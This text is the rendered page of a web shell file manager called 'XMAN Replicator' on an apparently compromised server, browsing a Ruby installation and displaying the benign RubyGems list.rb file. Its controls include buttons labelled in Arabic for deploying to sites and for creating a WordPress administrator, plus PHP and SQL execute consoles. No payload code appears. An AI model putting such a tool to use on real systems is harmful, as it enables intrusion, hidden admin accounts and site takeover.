🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
ruby22
/
lib64
/
ruby
/
2.2.0
/
rubygems
/
util
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:43
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:43
🔄
🗑️
🗑️📁
⬇️
🔒
list.rb
673 B
-rw-r--r--
2013-10-20 00:31
✏️
🔄
🗑️
⬇️
🔒
stringio.rb
450 B
-rw-r--r--
2013-11-19 00:34
✏️
🔄
🗑️
⬇️
🔒
Edit: list.rb
module Gem List = Struct.new(:value, :tail) class List def each n = self while n yield n.value n = n.tail end end def to_a ary = [] n = self while n ary.unshift n.value n = n.tail end ary end def find n = self while n v = n.value return v if yield(v) n = n.tail end nil end def prepend(value) List.new value, self end def pretty_print q # :nodoc: q.pp to_a end def self.prepend(list, value) return List.new(value) unless list List.new value, list end end end
Save
PHP Console
Execute
SQL Console
Execute